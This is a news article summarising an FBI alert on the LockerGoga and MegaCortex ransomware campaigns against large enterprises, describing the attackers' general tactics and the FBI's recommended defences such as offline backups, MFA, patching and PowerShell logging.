The FBI has released a TLP:Amber alert as a reaction to a number of cyberattacks involving the ransomware strainsLockerGoga and MegaCortex. The threat actors employing these ransomware variants have been focusing on large enterprises and organizations and normally deploy the ransomware many months after a network has been infiltrated.
LockerGoga was first discovered in January 2019 and MegaCortex ransomware first registered during May 2019. Both ransomware strains exhibit similar IoCs and have similar C2 infrastructure and are both used in highly focused attacks on big corporate networks.
LockerGoga was implemented in the ransomware attacks on the U.S. chemical firms Hexion and Momentive, the aluminum and energy company Norsk Hydro, and the engineering consulting business, Altran Technologies. MegaCortex ransomware was deployed in the attacks on the accounting software firm Wolters Kluwer and the cloud hosting firm iNSYNQ, among others The threat actors are meticulous, methodical, and try to cause maximum damage to increase the probability that their victim’s will meet the ransom demands. These are often of the order of hundreds of thousands of dollars or higher.
The first compromise is achieved through a variety of methods including the exploitation of unpatched flaws, phishing attacks, SQL injection, brute force tactics on RDP, and the use of stolen credentials. Once infiltrated, the hackers run batch files to stop processes and services used by security solutions to ensure their presence is not discovered. The hackers move laterally to compromise as many devices as possible using a penetration testing tool titled Cobalt Strike, living-of-the-land Windows binaries, and legitimate software tools such as Mimikatz. A beacon is added to each infiltrated device on the network, which is used to run PowerShell scripts, escalate privileges, and spawn a new session to act as a listener on the victim’s system, according to the FBI warning, as reported by Bleeping Computer which downloaded a copy of the alert.
As opposed to many other threat actors who deploy ransomware soon after a system is infiltrated, the threat actors behind these attacks often wait several months before the ransomware encryption routine is triggered. It is not known what the threat actors do during that time, but it is likely the time is used to take sensitive data. The ransomware is deployed in the last stage of the attack once all useful data has been obtained from the victims.
The advice provided by the FBI to improve security is standard for stopping ransomware and other cyberattacks. Cybersecurity best practices should be adhered to, including backing up data regularly; storing backup copies on non-networked devices; testing backups to see to it that file recovery is possible; setting strong passwords; patching quickly; enabling multi-factor authentication, especially on admin accounts; ensuring RDP servers can only be accessed through a VPN; turning off SMBv1; and to search for open ports and block them to prevent them from being accessible.
The FBI also advises auditing the creation of new accounts and monitoring Active Directory for amendments to authorized users; enabling PowerShell logging and monitoring for unusual commands, such as the execution of Base64 encoded PowerShell; and ensuring only the most recent version of PowerShell is installed.